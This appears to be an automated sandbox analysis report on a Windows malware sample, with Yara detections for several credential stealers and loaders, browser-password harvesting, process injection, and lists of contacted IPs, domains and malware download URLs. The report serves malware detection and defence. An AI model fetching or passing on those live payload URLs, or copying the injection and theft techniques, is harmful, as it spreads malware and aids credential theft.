Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_00421A60 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00421A60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 20_2_6AB94020

Stealing of Sensitive Information:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.937590546.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.932395754.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.928126221.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 11.2.9A4B.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.F7E3DjYJpC.exe.2d215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.20BD.exe.2fa0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.20BD.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.1.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.20BD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.iwbavbe.2bc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.iwbavbe.2c515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.888009215.0000000002C40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.876148906.0000000004C51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.873601079.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.741479676.0000000000451000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.726672116.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.807321223.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.807649884.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.890437795.00000000047D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.741456691.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.845161453.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Raccoon Stealer
Source: Yara match File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.937590546.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.932395754.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.928126221.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 11.2.9A4B.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.F7E3DjYJpC.exe.2d215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.20BD.exe.2fa0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.20BD.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.1.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.20BD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.iwbavbe.2bc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.iwbavbe.2c515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.888009215.0000000002C40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.876148906.0000000004C51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.873601079.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.741479676.0000000000451000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.726672116.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.807321223.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.807649884.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.890437795.00000000047D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.741456691.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.845161453.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 511974 Sample: F7E3DjYJpC.exe Startdate: 29/10/2021 Architecture: WINDOWS Score: 100 81 api.2ip.ua 2->81 105 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->105 107 Antivirus detection for URL or domain 2->107 109 Antivirus detection for dropped file 2->109 111 12 other signatures 2->111 11 F7E3DjYJpC.exe 2->11         started        13 iwbavbe 2->13         started        15 iwbavbe 2->15         started        signatures3 process4 signatures5 18 F7E3DjYJpC.exe 11->18         started        21 iwbavbe 13->21         started        121 Machine Learning detection for dropped file 15->121 23 iwbavbe 15->23         started        process6 signatures7 97 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 18->97 99 Maps a DLL or memory area into another process 18->99 101 Checks if the current machine is a virtual machine (disk enumeration) 18->101 103 Creates a thread in another existing process (thread injection) 18->103 25 explorer.exe 14 18->25 injected process8 dnsIp9 91 216.128.137.31, 80 AS-CHOOPAUS United States 25->91 93 sysaheu90.top 185.98.87.159, 49764, 49765, 49766 VM-HOSTINGRU Russian Federation 25->93 95 6 other IPs or domains 25->95 65 C:\Users\user\AppData\Roaming\ssbavbe, PE32 25->65 dropped 67 C:\Users\user\AppData\Roaming\iwbavbe, PE32 25->67 dropped 69 C:\Users\user\AppData\Roaming\abbavbe, PE32 25->69 dropped 71 14 other files (13 malicious) 25->71 dropped 113 System process connects to network (likely due to code injection or exploit) 25->113 115 Benign windows process drops PE files 25->115 117 Deletes itself after installation 25->117 119 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->119 30 20BD.exe 1 25->30         started        34 69B.exe 21 6 25->34         started        37 46D6.exe 25->37         started        39 7 other processes 25->39 file10 signatures11 process12 dnsIp13 73 C:\Users\user\AppData\Local\Temp\1105.tmp, PE32 30->73 dropped 123 Multi AV Scanner detection for dropped file 30->123 125 DLL reload attack detected 30->125 127 Detected unpacking (changes PE section rights) 30->127 143 2 other signatures 30->143 83 cdn.discordapp.com 162.159.130.233, 443, 49800, 49804 CLOUDFLARENETUS United States 34->83 75 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 34->75 dropped 129 Machine Learning detection for dropped file 34->129 131 Writes to foreign memory regions 34->131 133 Allocates memory in foreign processes 34->133 145 3 other signatures 34->145 41 AdvancedRun.exe 34->41         started        43 powershell.exe 34->43         started        45 aspnet_regbrowsers.exe 34->45         started        147 3 other signatures 37->147 85 91.219.236.97, 49865, 80 SERVERASTRA-ASHU Hungary 39->85 87 162.159.129.233, 443, 49841, 49856 CLOUDFLARENETUS United States 39->87 89 2 other IPs or domains 39->89 77 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 39->77 dropped 79 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 39->79 dropped 135 Antivirus detection for dropped file 39->135 137 Early bird code injection technique detected 39->137 139 Tries to harvest and steal browser information (history, passwords, etc) 39->139 141 Queues an APC in another process (thread injection) 39->141 47 9A4B.exe 39->47         started        50 31F4.exe 39->50         started        53 AdvancedRun.exe 39->53         started        55 2 other processes 39->55 file14 signatures15 process16 file17 57 AdvancedRun.exe 41->57         started        59 conhost.exe 43->59         started        149 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 47->149 151 Maps a DLL or memory area into another process 47->151 153 Checks if the current machine is a virtual machine (disk enumeration) 47->153 155 Creates a thread in another existing process (thread injection) 47->155 63 C:\Users\user\AppData\Local\...\sqtvvs.exe, PE32 50->63 dropped 61 AdvancedRun.exe 53->61         started        signatures18 process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.98.87.159
 privacytoolzforyou-6000.top Russian Federation
205840 VM-HOSTINGRU false
45.141.84.21
 nusurtal4f.net Russian Federation
206728 MEDIALAND-ASRU false
162.159.130.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false
91.219.236.97
 unknown Hungary
56322 SERVERASTRA-ASHU true
162.159.129.233
 unknown United States
13335 CLOUDFLARENETUS false
31.166.224.38
 znpst.top Saudi Arabia
35819 MOBILY-ASEtihadEtisalatCompanyMobilySA false
172.67.160.46
 toptelete.top United States
13335 CLOUDFLARENETUS false
216.128.137.31
 unknown United States
20473 AS-CHOOPAUS true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
privacytoolzforyou-6000.top 185.98.87.159 true
toptelete.top 172.67.160.46 true
cdn.discordapp.com 162.159.130.233 true
api.2ip.ua 77.123.139.190 true
znpst.top 31.166.224.38 true
nusurtal4f.net 45.141.84.21 true
hajezey1.top 185.98.87.159 true
sysaheu90.top 185.98.87.159 true
telegalive.top unknown unknown
xacokuo8.top unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sysaheu90.top/game.exe true
  • Avira URL Cloud: malware
 unknown
http://privacytoolzforyou-6000.top/downloads/toolspab2.exe true
  • Avira URL Cloud: malware
 unknown
https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg false
    		high
    https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg false
      		high
      http://toptelete.top/agrybirdsgamerept true
      • Avira URL Cloud: malware
      		 unknown
      https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg false
        		high
        http://hajezey1.top/ true
        • Avira URL Cloud: malware
        		 unknown
        http://91.219.236.97/ true
        • Avira URL Cloud: safe
        		 unknown
        https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg false
          		high
          http://nusurtal4f.net/ false
          • Avira URL Cloud: safe
          		 unknown
          http://znpst.top/dl/buildz.exe true
          • Avira URL Cloud: malware
          		 unknown
          http://91.219.236.97//l/f/ip0YyXwB3dP17SpzPFlO/7c7502fb88fbef5f30b90af154a6ea21b780c146 true
          • Avira URL Cloud: safe
          		 unknown
          https://cdn.discordapp.com/attachments/893177342426509335/903702020781907998/4D0A6361.jpg false
            		high
            http://91.219.236.97//l/f/ip0YyXwB3dP17SpzPFlO/0d74e69ed04647decaae0af5f3dee7a1ada201c0 true
            • Avira URL Cloud: safe
            		 unknown